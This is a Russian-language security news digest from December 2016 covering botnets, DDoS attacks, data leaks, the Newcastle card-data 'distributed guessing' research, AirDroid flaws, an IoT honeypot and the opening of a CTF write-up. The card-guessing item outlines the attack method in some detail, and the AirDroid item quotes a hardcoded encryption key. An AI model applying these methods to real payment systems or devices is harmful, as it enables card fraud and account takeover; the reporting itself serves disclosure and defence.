    Заместитель управляющего Отделением ГУ ЦБ РФ по Ярославской области Евгений Ефремов рекомендовал игнорировать подобные сообщения и не звонить по указанным в них номерам. В случае возникновения вопросов связаться с банком можно по номеру телефона, указанному на его официальном сайте или на самой карте.

    orig: 2016-12-06 06:35:48 / http://www.securitylab.ru/news/484650.php (click post title)



    WordPress будет требовать от хостеров поддержку HTTPS

    Для того чтобы повысить безопасность и конфиденциальность своих пользователей, новые функции WordPress потребуют от хостеров поддержку HTTPS. С начала 2017 года WordPress будет поддерживать только тех хостинг-партнеров, которые предоставляют SSL-сертификат (Secure Sockets Layer) по умолчанию. Популярная система управления контентом (CMS) будет оценивать использование SSL и включать соответствующие функции только в том случае, если технология безопасности доступна.

    Основной причиной принятия такого решения послужила идея о том, что зашифрованный протокол приведет к повышению общей безопасности в Интернете для всех людей. Крупные компании уже объявили о планах полного перехода на HTTPS, например, Googleinfo-icon, которые уже в течение нескольких лет выступают за улучшение безопасности в интернете. 

    В прошлом году Google заявили, что будут отдавать приоритет в выдаче страницам, которые используют HTTPS вместо HTTP. С того времени компания приступила к мониторингу использования HTTPS на ста самых популярных сайтов в интернете. WordPress поддерживали шифрование для сайтов, использующих поддомены WordPress.com на протяжении нескольких лет. В апреле WordPress объявили о том, что будут предлагать бесплатный HTTPS доменам, находящимся в их хост-зоне, включая блоги и сайты.

    Требуя, чтобы все хостеры имели HTTPS, WordPress гарантирует, что и клиенты и пользователи смогут ощутить все преимущества безопасного протокола. В течение 2017 года CMS будет анализировать влияние SSL на конкретные функции, например, на API-аутентификацию.

    «Так же, как JavaScript и более современные версии PHP имеют решающее значение для производительности и пользовательского опыта, SSL будет следующим шагом для пользователей» - говорит создать WordPress Мэтт (Matt Mullenweg).

    По словам Малленвега, улучшение производительности в PHP7 настолько существенно, что WordPress рассмотрит вопрос о том, чтобы требовать от хостеров установки этой версии. Тем не менее, никакого официального решения по этому вопросу не было объявлено.

    orig: 2016-12-06 06:19:31 / https://www.anti-malware.ru/news/2016-12-06/21626 (click post title)



    Ботнет Kelihos распространяет вымогателя Troldesh

    Ботнет Kelihos существует уже около восьми лет и пережил по крайней мере две попытки закрытия — в 2011 и 2012 годах.

    За время своего существования он служил для самых различных целей — от доставки любовного спама до распространения вымогателей вроде MarsJoke и Wildfire. С августа злоумышленники используют ботнет для раздачи шифровальщиков и банкеров, и в какой-то момент Kelihos трижды вырос в размерах всего за ночь. Он начал распространять такие зловреды, как Panda Zeus, Nymain и Kronos, но вскоре снова вернулся к старому доброму вымогательскому ПО.

    В настоящее время исследователи наблюдают, что Kelihos занимается распространением вредоносного спама, содержащего шифровальщик Troldesh. Жертва должна кликнуть на вредоносную ссылку, ведущую на документ Word и вредоносный JavaScript. Это первый случай заражения JS-файлом через этот ботнет.

    Особая ирония состоит в том, что зловред шифрует файлы, добавляя расширение .no_more_ransom, копирующее название известной инициативы, направленной на борьбу с вымогательским ПО. Последняя уже помогла тысячам пользователей расшифровать файлы без уплаты выкупа.

    Troldesh распространяется по адресам в зоне .au, то есть кампания направлена преимущественно на жителей Австралии. Спам-сообщения, которые должны обманом заставить пользователей загрузить вымогатель, имитируют сообщения банка Bank of America о якобы имеющейся задолженности и предлагают открыть файл, где описаны действия для «разрешения ситуации».

    После того как пользователь скачивает вымогатель, последний шифрует файлы и демонстрирует сообщение с требованием выкупа (на русском и английском языках). Для связи со злоумышленниками используется адрес почты Gmail. Также в инструкции рассказано, как загрузить Tor-браузер и заходить на .onion-сайты.

    Кроме того, Troldesh умеет загружать другое вредоносное ПО на инфицированный компьютер — например, зловред Pony для похищения информации.

    orig: 2016-12-06 06:14:39 / https://threatpost.ru/botnet-kelihos-rasprostranyaet-vymogatelya-troldesh/19496/ (click post title)



    Масштабные DDoS-атаки происходят по графику

    Исследователи CloudFlare считают, что новый масштабный ботнет, который, как предполагают, ответственен за ряд мощных и продолжительных атак, можно сравнить с Mirai.

    Атаки начались 23 ноября и продолжались по восемь часов в день, будто согласно рабочему графику. Они происходили в течение семи дней, начинаясь в 10 утра по тихоокеанскому времени. На восьмой день дидосеры решили усилить эффект, и атаки продолжались по 24 часа подряд. Пиковая мощность составила 400 Гбит/c — это сравнимо с мощностью Mirai, достигавшей 620 Гбит/c.

    «По нашим сведениям, злоумышленники атакуют ресурсы для геймеров, а также площадки, где продаются виртуальные товары и услуги», — сказал Джон Грэм-Каммингс (John Graham-Cummings), технический директор CloudFlare, заметивший атаки и сообщивший о них в блоге в прошлую пятницу. Атаки осуществляются, по некоторым данным, с китайских IP-адресов и направлены исключительно на сервера в Калифорнии.

    «Цель атак — истощение ресурса протоколов передачи TCP-трафика на уровнях L3 и L4 сетевой архитектуры», — пояснил Грэм-Каммингс. Кроме того, эксперт уточнил, что исследуемый ботнет в DDoS-атаках использует SYN-пакеты, тогда как атаки Mirai нацеливались на уровень L7 сети (HTTP).

    В настоящий момент CloudFlare не может определить, какой тип устройств (IoT-устройства, ПК или сервера) используется в ботнете. В случае с Mirai атакующие задействовали ботнеты из IoT-устройств.

    В сентябре после первой атаки исходный код Mirai был опубликован в открытом доступе. На прошлой неделе исследователи наткнулись на новый вариант Mirai, нацеленный на DSL-роутеры германского оператора Deutche Telekom и атакующий порт 7547 для трафика TCP NTP. В результате атаки 900 тыс. пользователей испытывали проблемы с доступом в Интернет.

    «Мы наблюдаем ряд подобных DDoS-атак нового типа, — сказал Грэм-Каммингс. — Сами атаки с технической точки зрения не новы, но мощность, продолжительность и масштаб этих атак — причина пристально следить за ними».

    По мнению исследователя, DDoS-атаки Mirai продолжатся и будут краткими, интенсивными и направленными на определенных жертв. Это можно объяснить тем, что со времени публикации исходного кода Mirai большинство дидосеров арендуют ботнеты Mirai на время для проведения краткосрочных атак.

    orig: 2016-12-06 06:02:40 / https://threatpost.ru/new-large-scale-ddos-attacks-follow-schedule/19493/ (click post title)



    В Сеть утекли данные более 85 млн пользователей видеохостинга DailyMotion

    Похищенная информация включает 85,2 млн уникальных логинов и адресов электронной почты.

    Неизвестный хакер предположительно взломал и похитил 85,2 млн учетных записей пользователей видеохостинга DailyMotion. По данным ресурса LeakedSource, инцидент произошел 20 октября 2016 года.

    Похищенная информация включает 85,2 млн уникальных логинов и адресов электронной почты. В порядка 20% случаев (около 18,3 млн) учетные записи содержали пароль, хешированный алгоритмом BCrypt.

    Журналисты ресурса ZDNet, получившие в распоряжение фрагмент похищенной базы, подтвердили подлинность информации. В настоящее время неизвестно, каким образом злоумышленнику удалось получить доступ к учетным записям. Представители ресурса DailyMotion отказались комментировать инцидент.

    В середине ноября нынешнего года стало известно о взломе учетных записей более 412 млн пользователей развлекательной сети FriendFinder Networks. Месяцем ранее жертвами утечки персональной информации стали пользователи бесплатного сервиса по созданию web-сайтов Weebly.

    orig: 2016-12-06 05:37:48 / http://www.securitylab.ru/news/484649.php (click post title)



    Сайты банка ВТБ стали жертвами кибератаки

    Неизвестные осуществили DDoS-атаку на ресурсы группы ВТБ.

    В понедельник, 5 декабря, сайты группы ВТБ подверглись DDoS-атаке. Как сообщает информагентство «Интерфакс» со ссылкой на пресс-службу финансовой организации, инцидент никак не повлиял на работу IT-инфраструктуры ее банков, и клиенты не испытывают никаких затруднений.

    Напомним, в пятницу, 2 декабря, Федеральная служба безопасности РФ предупредила о возможных кибератаках на российские кредитные организации, запланированных на 5 декабря. Как сообщалось на сайте ФСБ, атаки должны были осуществляться с серверов украинской хостинговой компании BlazingFast, расположенных в Нидерландах. Согласно заявлению представителей хостинг-провайдера, BlazingFast ведет непрерывный мониторинг своих систем, «чтобы предотвращать случаи, которые могут возникнуть».

    По данным «Интерфакса», Сбербанк работает в штатном режиме, и предпринимались ли какие-либо попытки атаковать его системы, неизвестно. Представители Альфа-банка, Тинькофф банка, «Ренессанс Кредита» и Абсолют банка сообщили об отсутствии подозрительной активности. С целью избежать последствий от возможных DDoS-атак в ночь на 5 декабря в Крыму были отключены банкоматы «Генбанка» и банка «Россия».

    orig: 2016-12-06 05:22:31 / http://www.securitylab.ru/news/484648.php (click post title)



    В России утверждена новая доктрина информационной безопасности

    Указ вступает в силу с момента его подписания.

    Президент РФ Владимир Путин подписал указ об утверждении новой редакции Доктрины информационной безопасности. Документ опубликован на официальном портале правовой информации.

    «В целях обеспечения информационной безопасности Российской Федерации постановляю утвердить прилагаемую Доктрину информационной безопасности Российской Федерации», - говорится в документе.

    Постановление вступает в действие с момента его подписания. Прежняя доктрина информационной безопасности РФ, одобренная в сентябре 2000 года, признана утратившей силу.

    Напомним, проект доктрины информационной безопасности страны был обнародован в июне нынешнего года. В качестве главных угроз документ определял «размывание духовно-нравственных ценностей» и воздействие иностранных государств.

    orig: 2016-12-06 04:20:50 / http://www.securitylab.ru/news/484647.php (click post title)



    Получение данных платежных карт распределенным подбором

    Исследователи из университета Ньюкасла доказали, что минимальный объем существующей информации не помешает злоумышленнику провести автоматизированную атаку подбором данных платежных карт, если в обработке платежей онлайн имеют место недочеты.

    Проблема в том, что в платежных системах глобального уровня отсутствует централизованный механизм мониторинга мошеннических попыток платежа на многочисленных сайтах. С помощью специализированного бота можно проверять платежные данные на разных сайтах до тех пор, пока не будет собрана вся необходимая информация, причем такие попытки даже не будут обнаружены.

    По свидетельству университетских исследователей, их «распределенная атака подбором» (distributed guessing) работает лишь против платежной экосистемы Visa. В ходе эксперимента им удалось провести брутфорс на 400 сайтах из списка Alexa, в том числе на PayPal и Amazon, и за считаные секунды получить номер карты, ее срок действия, код CVV и другие реквизиты.

    Университетские исследователи предупреждают, что подобные атаки масштабируются и практически осуществимы. Visa и 36 затронутых сайтов были извещены о возможности злоупотреблений до выхода научной статьи «Does The Online Card Payment Landscape Unwittingly Facilitate Fraud?» («Правда ли, что современное состояние платежного онлайн-сервиса облегчает задачу мошенникам?»). Операторы восьми популярных сайтов уже приняли меры защиты: замедлили обработку повторных запросов, ввели CAPTCHA и т.п. Представители Visa со своей стороны заявили, что исследователи не учли наличие систем предотвращения фрода, однако Мохаммед Али (Mohammed Aamir Ali), один из соавторов отчета, отметил, что их PoC-атака как раз показывает слабости многослойной защиты Visa, которые сможет использовать продвинутый злоумышленник.

    «Эта атака использует функциональность платежной системы, предназначенную для валидации данных карт, — пишут исследователи. — Однако в данном случае она помогает атакующим генерировать все поля данных о защите, необходимые для проведения онлайн-транзакций. Мы покажем, что данная атака не имеет практического применения, если все сайты, проводящие платежи, выполняют одни и те же проверки на безопасность».

    По некоторым предположениям, аналогичная распределенная атака была недавно проведена против британского банка Tesco. В результате этой атаки были похищены денежные средства с 20 тыс. клиентских счетов. «У нас слишком мало данных, чтобы подтвердить это заявление», — сказал Али в ответ на запрос Threatpost.

    Исследователи проверили на уязвимость не только Visa, но и MasterCard. Оказалось, что у MasterCard есть централизованная сеть, способная обнаружить атаку подбором после 10 попыток, даже если атака распределена по разным сайтам. Visa такой защитой не обладает. «Автор атаки может начать с лэптопа, подключенного к Интернету, — рассказывает Али. — Вначале ему потребуются первые шесть цифр — идентификационный номер банка, который обычно публикуется в Интернете».

    В отчете исследователей отмечено, что их атака использует два слабых места, каждое из которых, взятое в отдельности, не даст нужного эффекта, а вместе они составляют угрозу для всей глобальной системы. К сожалению, платежные системы зачастую не способны обнаружить невалидный запрос на проведение платежа, поданный на разных сайтах. «Это означает, что, распределив попытки подбора по многим сайтам, можно гадать практически бесконечно, даже если отдельные сайты ограничивают число попыток», — сказано в отчете.

    Вторым узким местом является отсутствие единообразия формы для ввода данных платежных карт. Некоторые сайты требуют основной учетный номер, срок окончания действия карты, код CVV и адрес, на других сайтах полей для ввода меньше. «Имея валидный номер карты (PAN), можно приступить к угадыванию даты истечения срока ее действия, — пишут далее исследователи. — Для этого подойдут несколько сайтов, которые проверяют лишь два поля: номер карты и срок ее действия. Получив дату окончания срока, атакующий сможет ее использовать вместе с номером карты, чтобы угадать информацию CVV2 на другой группе сайтов, проверяющих три поля (номер карты, срок окончания действия и CVV2)».

    Для проведения автоматизированной PoC-атаки были созданы бот и скрипты для Firefox, написанные с помощью фреймворка Java Selenium. При этом на бот были возложены функции ввода и подбора значений для каждого поля. В итоге дату истечения срока действия карты удавалось угадать в среднем за 60 попыток, код CVV — менее чем за 1 тыс. попыток.

    «Если бы все коммерсанты использовали три поля и запрашивали дату окончания действия и CVV2, то нам потребовалось бы 60 x 1000 = 60 000 попыток, — признали исследователи. — Разница между 1060 и 60 000 — это разница между быстрой, практически осуществимой атакой и трудоемкой атакой, осуществить которую почти нереально».

    «Мы доказали, как важно быть на шаг впереди в противостоянии киберкриминалу, совершенствовать систему, находить узкие места и учиться на ошибках», — говорит Али. Соавторы статьи ратуют за централизованную систему проверки безопасности транзакций, реализация которой, по их мнению, способна предотвратить атаку distributed guessing. Разумеется, это потребует создания специальных шлюзов или сетей, отображающих все попытки проведения платежей на коммерческих сайтах. В качестве альтернативного варианта исследователи предлагают стандартизировать интерфейс, используемый клиентами платежной системы.

    «И стандартизация, и централизация противоречат принципам гибкости и свободы выбора, ассоциируемым с Интернетом или успешной коммерческой деятельностью, однако они обеспечат требуемую защиту, — пишут исследователи. — Целесообразность и сроки внедрения таких решений придется определять самим заинтересованным сторонам».

    orig: 2016-12-05 23:56:55 / https://threatpost.ru/distributed-guessing-attack-reels-in-payment-card-data/19491/ (click post title)



    Chrome 55 исправляет 36 уязвимостей и блокирует Flash по умолчанию

    На этой неделе Googleinfo-icon выпустили Chrome 55, в котором исправляются 36 брешей в безопасности. Также в новой версии браузера по умолчанию будет отключен популярный плагин Adobeinfo-icon Flash.

    Из обнаруженных уязвимостей 26 были найдены исследователями со стороны и Google выплатили им 70 000 $. 12 из них получили высокую степень опасности, 9 среднюю степень и 5 низкую.

    Подробнее обо всех обнаруженных уязвимостей Google написали на канале обновлений.

    Помимо исправленных уязвимостей, Chrome 55 повышает безопасность пользователей, блокируя Flash-контент на сайтах. Отныне HTML5 будет использоваться по умолчанию и пользователям придется вручную включать Flash на сайтах, которые требуют этого.

    Несмотря на то, что Flash Player не будет использоваться, он все еще будет идти в комплекте с Chrome. Google также отмечают, что включив Flash один раз на сайте, который требует этого, пользователям больше не придется этого делать, так как браузер запомнит эту настройку.

    Начиная с января 2017 года Google также удалит Flash-рекламу со своих платформ, напомним, что с июня 2016 года Google перестал ее принимать. Компания рекомендует использовать HTML5 для рекламных объявлений и советует переходить с Flash как можно быстрее. Amazon в прошлом году тоже перестали принимать Flash-объявления.

    Кроме того, Chrome 55 устраняет проблему, возникающую при посещении сайтов, использующих сертификаты Symantecinfo-icon, GeoTrust и Thawte SSL/TLS. Согласно Symantec, есть все еще нерешенный вопрос с приложениями для Androidinfo-icon, влияющими на WebView версии 53, но WebView 54 и Chrome 55 решают ее.

    orig: 2016-12-05 21:36:01 / https://www.anti-malware.ru/news/2016-12-06/21624 (click post title)



    Порядок постоянного хранения и использования учетно-технической документации


    Распоряжением Комитета имущественных отношений Санкт-Петербурга от 16 ноября 2016 года №140-р утвержден «Порядок постоянного хранения и использования учетно-технической документации об объектах государственного технического учета и технической инвентаризации, предоставления копий учетно-технической документации об объектах государственного технического учета и технической инвентаризации и содержащихся в ней сведений, о взимании и возврате платы, о размерах платы за предоставление копий учетно-технической документации об объектах государственного технического учета и технической инвентаризации и содержащихся в ней сведений»
    Для справки: Федеральный закон от 30.12.2015 № 452-ФЗ «О внесении изменений в Федеральный закон «О государственном кадастре недвижимости» и статью 76 Федерального закона «Об образовании в Российской Федерации» в части совершенствования деятельности кадастровых инженеров» регламентировал вопросы хранения документов государственного земельного кадастра (ст.45).  В отдельную группу были выделен ряд документов, которые по состоянию на 1 января 2013 года хранилась в органах и организациях по государственному техническому учету и/или технической инвентаризации и стали собственностью субъекта РФ. Их хранение теперь относится к полномочиям соответствующего субъекта РФ (п.2.1). Новые положения вступили в силу с 30 декабря 2015 года.Порядок распространяется на технические паспорта, оценочную и иную хранившуюся по состоянию на 01.01.2013 в органах и организациях по государственному техническому учету и(или) технической инвентаризации учетно-техническую документацию об объектах государственного технического учета и технической инвентаризации (регистрационные книги, реестры, копии правоустанавливающих документов и тому подобного) (п.1).

    Одновременно утверждены:

    Учетно-техническая документация является государственной собственностью Санкт-Петербурга (п.1.3). Ее постоянное хранение осуществляется Санкт-Петербургским государственным унитарным предприятием «Городское управление инвентаризации и оценки недвижимости», заключившим с Комитетом имущественных отношений Санкт-Петербурга договор ее хранения, в порядке, установленном законодательством Российской Федерации (п.1.4).

    В целях обеспечения постоянного хранения и использования учетно-технической документации и содержащихся в ней сведений уполномоченная организация выполняет следующие функции (п.1.5):Весьма интересен раздел 2 «Состав архива». Архив, по мнению разработчика нормативно-правового акта, состоит из следующих единиц хранения (п.2.1):
    Мой комментарий: «Все смешалось в доме Облонских» … Разработчики НПА сами
     «Правила организации хранения, комплектования, учета и использования документов Архивного фонда Российской Федерации и других архивных документов в органах государственной власти, органах местного самоуправления и организациях, утвержденные приказом Минкультуры России от 31.03.2015 № 526, не читали, и согласовать свой  текст с архивистами не удосужились. Описи дел – это документы учета и научно-справочный аппарат архива. :)

    Учет документов в архиве строится на основе соблюдения принципа централизации, выраженного в применении единых правил учета (п.2.2).

    Инвентарные дела вносятся в книги учета инвентарных дел, формируемых из учетных записей в алфавитном порядке названий улиц по порядку возрастания номеров домов на улице. Книга учета инвентарных дел содержит информацию об инвентарном номере дела, адресе объекта, количестве томов инвентарного дела (п.2.3).

    Мой комментарий: Учет в архиве будет, видимо, вестись на бумажных носителях – т.е. вперёд в прошлое! Лично я бы не стала передавать функции хранения документов организации, которая не может обеспечить ведение электронного учета передаваемой ей на хранения документации.

    Порядок хранения и использования учетно-технической документации, режим хранения документов архива, требования к помещениям архива определяются в соответствии с законодательством об архивном деле (п.3.1).

    Постоянное хранение осуществляется в архивохранилище, недоступном для посторонних лиц, в условиях, обеспечивающих предотвращение хищения, утраты или порчи документов, искажения, подделки или утраты содержащейся в них информации (п.3.2).

    Учет и систематизация инвентарных дел заключаются в проверке соответствия присвоенных им инвентарных номеров в соответствующих книгах учета, с указанными номерами на обложках инвентарных дел и размещении их на соответствующем месте в архивохранилище (п.3.3).

    В целях проверки наличия и состояния учетно-технической документации проводится инвентаризация архива (п.3.4). Она проводится в целях установления фактического наличия единиц хранения и соответствия их количеству, числящемуся по учетным документам, выявления документов, подлежащих реставрации и профилактической обработке (п.3.4.1).

    В ходе проверки осуществляется:
    Инвентаризация архива проводится не реже чем один раз в год (п.3.4.2).

    Мой комментарий: Интересно, кто это придумал - ежегодно проводить сверку наличия дел? Это очень трудоемкая работа (если только не использовать современные технологии типа RFID-радиометок), и не думаю, что организация обладает соответствующим числом сотрудников.

    По окончании проверки архива акт(ы) проверки включается в соответствующее дело и хранится в архиве (п.3.4.3).

    Если проверкой обнаружена недостача дел и документов, то организуется их поиск (п.3.4.4). После рассмотрения результатов поиска лицом, ответственным за обеспечение сохранности, принимается решение о порядке и сроках восстановления утраченных документов (п.3.4.5).

    Ответственность за сохранность учетно-технической документации несет руководитель уполномоченной организации, осуществляющей постоянное хранение (п.3.6).

    Мой комментарий: Даже при утрате значительного числа документов, всё, что грозит руководителю – это «страшный» штраф в 500 рублей.

    Учетно-техническая документация используется при предоставлении их копий и содержащихся в ней сведений (п.4.1). Сведения, содержащиеся в ней, являются общедоступными, за исключением сведений, доступ к которым ограничен федеральными законами (п.4.2).

    Внесение изменений и дополнений в документы архива не допускается (п.4.3).

    Мой комментарий: Меня впечатлил размер платы, установленный в данном документе (приложение 4): минимальная стоимость копии 1 листа документа в формате A4, например, Технического паспорта, обойдется в 442 рубля, а за ряд справку, содержащую сведения об инвентаризационной стоимости объекта, придется выложить 3449 рублей.

    Возникает вопрос: почему установлены такие цены, и как это соотносится с требованием законодательства о доступе к государственной информации и «Правилами взимания платы за предоставление информации о деятельности государственных органов и органов местного самоуправления», утвержденными Постановлением Правительства РФ от 24 октября 2011 г. №860, которым предусмотрено бесплатное предоставление копий документов до 20 страниц формата А4, или 10 страниц формата А3, или 5 страниц формата А2, или 1 страницу формата, превышающего формат А2.

    Источник: Консультант Плюс
    http://www.consultant.ru/cons/cgi/online.cgi?req=doc&base=SPB&n=179727

    orig: 2016-12-05 21:05:07 / http://rusrim.blogspot.com/2016/12/blog-post_6.html (click post title)



    В России пресечено вымогательство с использованием блокера

    Житель Волгограда и его сообщница подозреваются в распространении вредоносной программы с целью вымогательства от имени МВД, ФСБ и ФССП России.

    «В поле зрения оперативников попали случаи использования вредоносных скриптов, вызывающих появление всплывающих окон и блокирующих нормальную работу интернет-браузера. В сообщении, демонстрируемом во всплывающем окне, говорилось о том, что компьютер пользователя заблокирован российскими правоохранительными органами за просмотр порнографических материалов и для продолжения работы следует оплатить штраф путем перечисления денег на анонимный счет в платежной системе», — комментирует представитель МВД России Ирина Волк.

    Выявить лиц, причастных к этой мошеннической схеме, удалось в ходе оперативно-разыскных мероприятий, проведенных силами Управления «К» МВД и его областного отдела. Ими оказались 40-летний житель Волгограда, скрывающийся от властей на территории Таиланда, и его гражданская жена.

    Поскольку оперативникам удалось пресечь противоправную деятельность в Сети, беглец был вынужден вернуться в Россию. Его задержали по прибытии в московский аэропорт Домодедово.

    Задержанный уже признал свою вину и добровольно выдал компьютерную технику, SIM-карты и банковские карты, задействованные в мошеннической схеме. В настоящее время определяется круг пострадавших; оба подозреваемых находятся под домашним арестом.

    Пользуясь случаем, Управление «К» МВД России предупреждает: правоохранительные органы никогда не блокируют компьютеры и мобильные устройства граждан. Любые сообщения с требованием уплатить штраф, отображаемые в браузере, являются результатом работы вредоносной программы или компрометации сайта. МВД не рекомендует платить вымогателям и советует пользоваться антивирусами.

    orig: 2016-12-05 21:04:10 / https://threatpost.ru/v_rossii_presecheno_vymogatelstvo_s_ispolzovaniem_blokera/19489/ (click post title)



    Торговец краденым получил четыре года

    Окружной суд Джорджии приговорил Аарона Гленде (Aaron James Glende) к четырем годам и двум месяцам тюремного заключения за продажу краденых данных интернет-пользователей на подпольном аукционе AlphaBay Market, размещенном в анонимной сети Tor.

    Согласно материалам дела, с ноября 2015 года по начало мая 2016-го Гленде, он же IcyEagle, рекламировал и продавал в Дарквебе личностную информацию и учетные данные пользователей, а также их банковские реквизиты, принимая оплату в биткойнах. По имеющимся данным, в указанный период он разместил на AlphaBay порядка 300 листингов такого рода.

    В марте и апреле текущего года IcyEagle продал несколько лотов агенту ФБР, работавшему под прикрытием. Как оказалось, купленные списки содержали логины и пароли, физические и email-адреса, номера телефонов и банковских карт.

    На компьютере Гленде, изъятом в ходе обыска после ареста, было обнаружено более 2,8 тыс. записей о пользователях, в том числе регистрационные данные для входа в системы онлайн-банкинга и другие аккаунты, номера страховок и номера кредитных карт.

    На сентябрьском заседании суда Гленде признал свою вину по всем вменяемым эпизодам махинаций со средствами доступа и кражи личности с отягчающими обстоятельствами. После выхода на свободу торговцу краденым предстоит провести три года под надзором.

    orig: 2016-12-05 17:06:12 / https://threatpost.ru/torgovets_kradenym_poluchil_4_goda/19482/ (click post title)



    Информзащита составила банкам рекомендации для обеспечения ИБ

    В пятницу 2 декабря Федеральная служба безопасности сообщила о подготовке иностранными спецслужбами масштабных кибератак с целью дестабилизации финансовой системы России.  С 5 декабря под угрозой окажутся крупнейшие банки страны.

    Компания «Информзащитаinfo-icon» рекомендует банкам и финансовым организациям принять необходимые меры для обеспечения своей информационной безопасности. В первую очередь, к ним относится выполнение рекомендаций Банка России и Минкомсвязи, которые были разосланы банкам и сотовым операторам.

    Немалое значение имеет актуализировать список ответственных лиц и перечень действий, предусмотренных Планами обеспечения непрерывности и восстановления деятельности (Планы ОНиВД, 242-П). Это касается контактов и действий руководства организаций, ключевых подразделений, служб ИТ и ИБ, администраторов ключевых систем, ключевых контрагентов и администраторов ключевых внешних сервисов.

    Также необходимо оценить актуальность следующих рисков и угроз:

    После оценки рисков в конкретной организации следует применить меры по их нейтрализации и устранению:

    Специалисты «Информзащиты» готовы проконсультировать финансовые организации по вопросам рисков и угроз, а также обеспечить реализацию мер защиты. 

    orig: 2016-12-05 16:41:32 / https://www.anti-malware.ru/news/2016-12-05/21623 (click post title)



    ESET предлагает бесплатную утилиту для жертв ботнета Avalanche

    ESETпредлагает бесплатную утилиту для проверки компьютера на предмет заражения бот-программами сети Avalanche, ликвидированной в конце ноября. В состав ботнета входило до 500 000 компьютеров по всему миру.

    Глобальный ботнет Avalancheвыведен из строя при участии правоохранительных органов и ИТ-специалистов из 40 стран мира. Сеть действовала больше семи лет, распространяя не менее 20 видов вредоносных программ, включая шифраторы и банковские трояны. Инфраструктура Avalanche использовалась для заражения пользователей вредоносным ПО TeslaCrypt, Nymain, Dridex, Qbotи др.

    ESET давно сотрудничает с правоохранительными органами для противодействия международной киберпреступности. Компания участвовала в ликвидации ботнета Dorkbot, заражавшего тысячи компьютеров в неделю, и сети Windigo, которая специализировалась на краже персональных данных и перенаправлении трафика на вредоносный контент. 

    orig: 2016-12-05 16:29:52 / https://www.anti-malware.ru/news/2016-12-05/21622 (click post title)



    Более 50 миллионов Android-устройств уязвимы из-за брешей в AirDroid

    Уязвимости в инструменте удаленного управления для Androidinfo-icon AirDroid ставит под угрозу более 50 миллионов устройств. Об этом предупреждают исследователи в области безопасности из Zimperium zLabs.

    Согласно официальному магазину приложений Googleinfo-icon Play, AirDroid скачали более 10 миллионов раз, однако эксперты утверждают, что количество устройств, на которых установлено это приложение в разы больше. Исследователи компании Zimperium утверждают, что уязвимости в AirDroid позволяют злоумышленникам использовать встроенные функции против пользователей.

    Оказалось, что AirDroid использует ненадежные каналы связи, что означает, что миллионы приложений подвержены атаке «человек посередине» (MitM) и другим видам атак. Также процесс обновления файлов APK может привести к возможности удаленного выполнения кода.

    При анализе AirDroid, исследователи обнаружили, что каналы связи, используемые для передачи данных аутентификации на сервер незащищены должным образом. Несмотря на то, что запросы зашифрованы с помощью Data Encryption Standard (DES), ключ шифрования жёстко зашит внутри приложения, это означает, что злоумышленник узнает его.

    Зная ключ, злоумышленник может провести атаку «человек посередине», с помощью которой он может получить учетные данные аутентификации из самого первого HTTP-запроса приложения. Затем атакующему уже не составит труда выдать себя за пользователя при дальнейших запросах, объясняет эксперт Zimperium.

    «HTTP- запрос можно расшифровать используя ключ 890jklms, который жестко закодирован внутри приложения, также можно получить поля аутентификации. Имея эту информацию, злоумышленник может выдавать себя за устройство жертвы и выполнять различные HTTP или HTTPS-запросы от его имени к API AirDroid» - отмечает исследователь.

    В дальнейшем хакер может обмануть сервер и получить другую информацию пользователя, например, электронную почту и хэш пароля.

    Более того, злоумышленник может перенаправлять HTTP-трафик на вредоносный прокси-сервер. Таким образом, он может подделать получаемые устройством обновления и выполнить произвольный код на системе.

    Zimperium отмечают, что большинство функциональных возможностей в AirDroid осуществляются с использованием безопасного протокола HTTPS, но небезопасные каналы используются для выполнения конкретных задач, таких как отправка статистики на удаленный сервер.

    По мнению Zimperium, решение проблемы заключается в использовании только безопасных каналов связи (HTTPS).

    orig: 2016-12-05 14:50:31 / https://www.anti-malware.ru/news/2016-12-05/21619 (click post title)



    IoT-Honeypot: Время жизни танка в бою - 10 минут.



    Вполне ожидаемый результат эксперимента по подверженности атакам IoT: 13 атак за первые 10 минут онлайна, 500+ атак за час от 10 различных атакующих. 


    It turns out they wouldn't have much time at all. In less than 10 minutes, the honeypot was hit with 13 brute force attacks. After an hour of being online, it had been attacked 551 times, with more than 10 unique attackers having interacted with the honeypot. I continued to monitor all activity for the rest of the week. When I finally shut down the honeypot, it had been subjected to 2,665 brute force attacks and more than 108 sessions where there was an attempt to gain access. Some of those sessions resulted in malware being downloaded. Это так сказать актуальное ad-hoc исследование. Если же придаться академизму - цифры будут еще более внушительными, вот сводка проекта IoTPot, например:
    During 39 days of the stable operation, 70,230 hosts visited IoTPOT. Among them, 49,141 successfully logged in and 16,934 attempted to download external malware binary files. We observed 76,605 download attempts in total. We manually downloaded 43 malware binaries of 11 CPU architectures. Among 43 collected samples, 39 samples were new to the database of VirusTotal [5] (as of 2015/05/13). Out of 4 samples that were in VirusTotal, 2 of them were not detected by any of the 57 A/Vs of VirusTotal (as of 2015/05/13). Атакуют быстро, мощно, обработанной малварью.

    А что в результате? Результаты уже достаточно резонансные и дальше будет веселей, ибо реакции на очевидную проблему не происходит, напротив непрерывно наращивается "пороховой склад" устройств и когда рванёт - мало никому не покажется.

    2017 - год восстания вещей?

    P.S. На #PHDays про это хотим много, с разных сторон и красной нитью. Более всего хотелось бы понять что делать и когда всё это кончится наметить пути решения этой небольшой катастрофы.

    orig: 2016-12-05 14:39:21 / http://kchln.blogspot.com/2016/12/iot-honeypot-10.html (click post title)



    CTFzone write-ups — MISC it all up

    image

    Друзья, по сложившейся за последний месяц традиции мы предлагаем вам начать новую неделю с нового райтапа. В этом посте мы подробно разберем задания из направления MISC, куда вошли все задания, не подходящие ни под какую другую категорию. Тут был нужен особенный креатив ;)

    Ветка MISC нашла отклик в душе наших игроков — за время соревнований мы получили около 300 флагов. Заметим, что из всех тасков на 1000, задание из этой категории было наиболее популярным — над ним ломали голову многие, но успеха достигли всего несколько человек. Поэтому мы решили пропустить задания на 50 и 100 очков и сразу перейти к более сложным и интересным заданиям. Поехали!



    MISC_300. Lithium|Beta
    A.U.R.O.R.A.: Lieutenant Friend, seems like this computer is frozen and we don’t have time to fix it. So from now on we have only this calculator interface (nc). I have to admit that your predecessor Lieutenant Petr was a very lazy developer (no idea how he managed to get on this ship) and he failed to complete Compiler Design course. So he wrote calculator in the easiest way using the simplest tools. I know that it’s quite complicated but you have to hurry, we haven’t got much time!


    Решение:

    Запускаем программу и видим, что это обычный калькулятор.

    image

    Как следует из легенды, эту программу писал ленивый разработчик. Скорее всего, это свидетельствует о том, что вместо парсинга математических выражений используется простой eval.

    Как видно на скриншоте, есть вывод названий ошибок, но без трейсов:

    image

